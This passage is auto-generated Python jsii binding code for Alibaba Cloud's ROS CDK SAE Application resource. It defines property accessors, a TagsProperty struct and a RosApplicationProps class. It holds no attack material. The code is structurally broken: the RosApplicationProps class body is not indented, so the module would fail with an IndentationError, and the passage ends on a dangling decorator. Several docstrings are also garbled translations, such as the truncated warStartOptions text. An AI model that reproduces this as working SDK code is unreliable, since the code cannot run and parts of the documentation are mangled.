        scope: ros_cdk_core.Construct,
        id: builtins.str,
        props: "RosApplicationProps",
        enable_resource_property_constraint: builtins.bool,
    ) -> None:
        '''Create a new ``ALIYUN::SAE::Application``.

        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param props: - resource properties.
        :param enable_resource_property_constraint: -
        '''
        # Construction is delegated to the jsii kernel, which creates the
        # backing JavaScript object for this resource.
        jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])

    @jsii.member(jsii_name="renderProperties")
    def _render_properties(
        self,
        props: typing.Mapping[builtins.str, typing.Any],
    ) -> typing.Mapping[builtins.str, typing.Any]:
        '''Render the given property map into template form via the jsii kernel.

        :param props: -
        '''
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))

    @jsii.python.classproperty # type: ignore[misc]
    @jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
    def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
        '''The resource type name for this resource class.'''
        return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))

    # ------------------------------------------------------------------
    # Read-only runtime attributes returned by ROS after deployment.
    # ------------------------------------------------------------------

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrAppId")
    def attr_app_id(self) -> ros_cdk_core.IResolvable:
        '''
        :Attribute: AppId: Creating successful application ID.
        '''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrChangeOrderId")
    def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
        '''
        :Attribute: ChangeOrderId: Return to release a single ID, used to query task execution status.
        '''
        return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="rosProperties")
    def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
        # Raw property map held by the jsii-side resource object.
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))

    # ------------------------------------------------------------------
    # Required template properties (getter/setter pairs proxied via jsii).
    # ------------------------------------------------------------------

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="appName")
    def app_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''
        :Property: appName: Application Name. Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
        '''
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "appName"))

    @app_name.setter
    def app_name(
        self,
        value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "appName", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="cpu")
    def cpu(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
        '''
        :Property: cpu: Each instance of the CPU required, in units of milli core, can not be zero. Currently only supports fixed specifications instance type.
        '''
        return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], jsii.get(self, "cpu"))

    @cpu.setter
    def cpu(self, value: typing.Union[jsii.Number, ros_cdk_core.IResolvable]) -> None:
        jsii.set(self, "cpu", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="enableResourcePropertyConstraint")
    def enable_resource_property_constraint(self) -> builtins.bool:
        return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))

    @enable_resource_property_constraint.setter
    def enable_resource_property_constraint(self, value: builtins.bool) -> None:
        jsii.set(self, "enableResourcePropertyConstraint", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="memory")
    def memory(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
        '''
        :Property: memory: Each instance of the required memory, in units of MB, can not be zero. Currently only supports fixed specifications instance type.
        '''
        return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], jsii.get(self, "memory"))

    @memory.setter
    def memory(
        self,
        value: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "memory", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="namespaceId")
    def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''
        :Property:
        namespaceId: EDAS namespace corresponding to ID. Canada supports only the name of the scribe lowercase namespace must begin with a letter.
        Namespace can interface to obtain from DescribeNamespaceList.
        '''
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "namespaceId"))

    @namespace_id.setter
    def namespace_id(
        self,
        value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "namespaceId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="packageType")
    def package_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''
        :Property: packageType: Application package type. Support FatJar, War, Image.
        '''
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "packageType"))

    @package_type.setter
    def package_type(
        self,
        value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "packageType", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="replicas")
    def replicas(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
        '''
        :Property: replicas: The initial number of instances.
        '''
        return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], jsii.get(self, "replicas"))

    @replicas.setter
    def replicas(
        self,
        value: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
    ) -> None:
        jsii.set(self, "replicas", value)

    # ------------------------------------------------------------------
    # Optional template properties.
    # ------------------------------------------------------------------

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="appDescription")
    def app_description(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: appDescription: Application description. No more than 1024 characters.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "appDescription"))

    @app_description.setter
    def app_description(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "appDescription", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="command")
    def command(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: command: Mirroring the start command. The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "command"))

    @command.setter
    def command(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "command", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="commandArgs")
    def command_args(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: commandArgs: Mirroring the start command parameters. Parameters required for the start-command. For example: [ "1d"]
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "commandArgs"))

    @command_args.setter
    def command_args(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "commandArgs", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="customHostAlias")
    def custom_host_alias(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: customHostAlias: Custom mapping host vessel. For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "customHostAlias"))

    @custom_host_alias.setter
    def custom_host_alias(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "customHostAlias", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="deploy")
    def deploy(
        self,
    ) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
        '''
        :Property: deploy: Whether deployed immediately take effect, the default is false.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], jsii.get(self, "deploy"))

    @deploy.setter
    def deploy(
        self,
        value: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "deploy", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="edasContainerVersion")
    def edas_container_version(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: edasContainerVersion: EDAS pandora runtime environment used by the application.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "edasContainerVersion"))

    @edas_container_version.setter
    def edas_container_version(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "edasContainerVersion", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="envs")
    def envs(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: envs: Container environment variable parameters. For example: [{ "name": "envtmp", "value": "0"}]
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "envs"))

    @envs.setter
    def envs(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "envs", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="imageUrl")
    def image_url(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: imageUrl: Mirroring address. Image only type of application can be configured to mirror address.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "imageUrl"))

    @image_url.setter
    def image_url(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "imageUrl", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="jarStartArgs")
    def jar_start_args(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property:
        jarStartArgs: Jar package startup application parameters. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
        $ JarStartArgs
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "jarStartArgs"))

    @jar_start_args.setter
    def jar_start_args(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "jarStartArgs", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="jarStartOptions")
    def jar_start_options(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property:
        jarStartOptions: Jar start the application package option. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
        $ JarStartArgs
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "jarStartOptions"))

    @jar_start_options.setter
    def jar_start_options(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "jarStartOptions", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="jdk")
    def jdk(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: jdk: Deployment of JDK version of the package depends on. Mirroring not supported.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "jdk"))

    @jdk.setter
    def jdk(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "jdk", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="liveness")
    def liveness(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: liveness: Container health check, health check fails container will be killed and recovery. Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "liveness"))

    @liveness.setter
    def liveness(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "liveness", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="mountDesc")
    def mount_desc(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: mountDesc: Mount Description
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "mountDesc"))

    @mount_desc.setter
    def mount_desc(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "mountDesc", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="mountHost")
    def mount_host(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: mountHost: nas mount point in the application of vpc.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "mountHost"))

    @mount_host.setter
    def mount_host(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "mountHost", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="nasId")
    def nas_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: nasId: Mount the NAS ID, you must be in the same region and cluster. It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "nasId"))

    @nas_id.setter
    def nas_id(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "nasId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="packageUrl")
    def package_url(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: packageUrl: Deployment packages address. Only FatJar War or the type of application can be configured to deploy packet address.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "packageUrl"))

    @package_url.setter
    def package_url(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "packageUrl", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="packageVersion")
    def package_version(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: packageVersion: The version number of the deployed package, War FatJar type required. Please customize it meaning.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "packageVersion"))

    @package_version.setter
    def package_version(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "packageVersion", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="postStart")
    def post_start(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "postStart"))

    @post_start.setter
    def post_start(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "postStart", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="preStop")
    def pre_stop(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "preStop"))

    @pre_stop.setter
    def pre_stop(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "preStop", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="readiness")
    def readiness(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: readiness: Application launch status check, health check fails repeatedly container will be killed and restarted. Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "readiness"))

    @readiness.setter
    def readiness(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "readiness", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="securityGroupId")
    def security_group_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: securityGroupId: Security group ID.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "securityGroupId"))

    @security_group_id.setter
    def security_group_id(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "securityGroupId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="slsConfigs")
    def sls_configs(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: slsConfigs: Log collection configuration file
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "slsConfigs"))

    @sls_configs.setter
    def sls_configs(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "slsConfigs", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="tags")
    def tags(self) -> typing.Optional[typing.List["RosApplication.TagsProperty"]]:
        '''
        :Property: tags: Tags to attach to application. Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
        '''
        return typing.cast(typing.Optional[typing.List["RosApplication.TagsProperty"]], jsii.get(self, "tags"))

    @tags.setter
    def tags(
        self,
        value: typing.Optional[typing.List["RosApplication.TagsProperty"]],
    ) -> None:
        jsii.set(self, "tags", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="timezone")
    def timezone(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: timezone: Application time zone. Default Asia/Shanghai.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "timezone"))

    @timezone.setter
    def timezone(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "timezone", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="vpcId")
    def vpc_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: vpcId: EDAS namespace corresponding VPC. In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "vpcId"))

    @vpc_id.setter
    def vpc_id(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "vpcId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="vSwitchId")
    def v_switch_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: vSwitchId: Application examples where the elastic card virtual switch. The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "vSwitchId"))

    @v_switch_id.setter
    def v_switch_id(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "vSwitchId", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="warStartOptions")
    def war_start_options(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :: " start
        :Property: warStartOptions: War Start the application package option. Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "warStartOptions"))

    @war_start_options.setter
    def war_start_options(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "warStartOptions", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="webContainer")
    def web_container(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''
        :Property: webContainer: Tomcat deployment of the package depends on the version. Mirroring not supported.
        '''
        return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "webContainer"))

    @web_container.setter
    def web_container(
        self,
        value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
    ) -> None:
        jsii.set(self, "webContainer", value)

    # Nested jsii struct describing one application tag (Key required,
    # Value optional).
    @jsii.data_type(
        jsii_type="@alicloud/ros-cdk-sae.RosApplication.TagsProperty",
        jsii_struct_bases=[],
        name_mapping={"key": "key", "value": "value"},
    )
    class TagsProperty:
        def __init__(
            self,
            *,
            key: typing.Union[builtins.str, ros_cdk_core.IResolvable],
            value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        ) -> None:
            '''
            :param key:
            :param value:
            '''
            self._values: typing.Dict[str, typing.Any] = {
                "key": key,
            }
            if value is not None:
                self._values["value"] = value

        @builtins.property
        def key(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
            '''
            :Property: key: undefined
            '''
            result = self._values.get("key")
            assert result is not None, "Required property 'key' is missing"
            return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)

        @builtins.property
        def value(
            self,
        ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
            '''
            :Property: value: undefined
            '''
            result = self._values.get("value")
            return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)

        def __eq__(self, rhs: typing.Any) -> builtins.bool:
            return isinstance(rhs, self.__class__) and rhs._values == self._values

        def __ne__(self, rhs: typing.Any) -> builtins.bool:
            return not (rhs == self)

        def __repr__(self) -> str:
            return "TagsProperty(%s)" % ", ".join(
                k + "=" + repr(v) for k, v in self._values.items()
            )
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.RosApplicationProps",
jsii_struct_bases=[],
name_mapping={
"app_name": "appName",
"cpu": "cpu",
"memory": "memory",
"namespace_id": "namespaceId",
"package_type": "packageType",
"replicas": "replicas",
"app_description": "appDescription",
"command": "command",
"command_args": "commandArgs",
"custom_host_alias": "customHostAlias",
"deploy": "deploy",
"edas_container_version": "edasContainerVersion",
"envs": "envs",
"image_url": "imageUrl",
"jar_start_args": "jarStartArgs",
"jar_start_options": "jarStartOptions",
"jdk": "jdk",
"liveness": "liveness",
"mount_desc": "mountDesc",
"mount_host": "mountHost",
"nas_id": "nasId",
"package_url": "packageUrl",
"package_version": "packageVersion",
"post_start": "postStart",
"pre_stop": "preStop",
"readiness": "readiness",
"security_group_id": "securityGroupId",
"sls_configs": "slsConfigs",
"tags": "tags",
"timezone": "timezone",
"vpc_id": "vpcId",
"v_switch_id": "vSwitchId",
"war_start_options": "warStartOptions",
"web_container": "webContainer",
},
)
class RosApplicationProps:
def __init__(
    self,
    *,
    app_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    cpu: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
    memory: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
    namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    package_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
    replicas: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
    app_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    command: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    command_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    custom_host_alias: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    deploy: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
    edas_container_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    envs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    image_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    jar_start_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    jar_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    jdk: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    liveness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    mount_desc: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    mount_host: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    nas_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    package_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    package_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    post_start: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    pre_stop: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    readiness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    security_group_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    sls_configs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    tags: typing.Optional[typing.Sequence[RosApplication.TagsProperty]] = None,
    timezone: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    vpc_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    v_switch_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    war_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    web_container: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
    '''Properties for defining a ``ALIYUN::SAE::Application``.

    The six leading parameters are required by the resource; every other
    parameter is optional and is only recorded when a non-None value is
    supplied.

    :param app_name:
    :param cpu:
    :param memory:
    :param namespace_id:
    :param package_type:
    :param replicas:
    :param app_description:
    :param command:
    :param command_args:
    :param custom_host_alias:
    :param deploy:
    :param edas_container_version:
    :param envs:
    :param image_url:
    :param jar_start_args:
    :param jar_start_options:
    :param jdk:
    :param liveness:
    :param mount_desc:
    :param mount_host:
    :param nas_id:
    :param package_url:
    :param package_version:
    :param post_start:
    :param pre_stop:
    :param readiness:
    :param security_group_id:
    :param sls_configs:
    :param tags:
    :param timezone:
    :param vpc_id:
    :param v_switch_id:
    :param war_start_options:
    :param web_container:
    '''
    # Required properties are stored unconditionally, in declaration order.
    self._values: typing.Dict[str, typing.Any] = {
        "app_name": app_name,
        "cpu": cpu,
        "memory": memory,
        "namespace_id": namespace_id,
        "package_type": package_type,
        "replicas": replicas,
    }
    # Optional properties, in the same order the template declares them;
    # a key is only added when the caller passed a non-None value, so the
    # resulting dict (and hence __repr__/__eq__) matches the hand-rolled
    # per-parameter version exactly.
    optional_values: typing.Dict[str, typing.Any] = {
        "app_description": app_description,
        "command": command,
        "command_args": command_args,
        "custom_host_alias": custom_host_alias,
        "deploy": deploy,
        "edas_container_version": edas_container_version,
        "envs": envs,
        "image_url": image_url,
        "jar_start_args": jar_start_args,
        "jar_start_options": jar_start_options,
        "jdk": jdk,
        "liveness": liveness,
        "mount_desc": mount_desc,
        "mount_host": mount_host,
        "nas_id": nas_id,
        "package_url": package_url,
        "package_version": package_version,
        "post_start": post_start,
        "pre_stop": pre_stop,
        "readiness": readiness,
        "security_group_id": security_group_id,
        "sls_configs": sls_configs,
        "tags": tags,
        "timezone": timezone,
        "vpc_id": vpc_id,
        "v_switch_id": v_switch_id,
        "war_start_options": war_start_options,
        "web_container": web_container,
    }
    for prop_name, prop_value in optional_values.items():
        if prop_value is not None:
            self._values[prop_name] = prop_value
@builtins.property
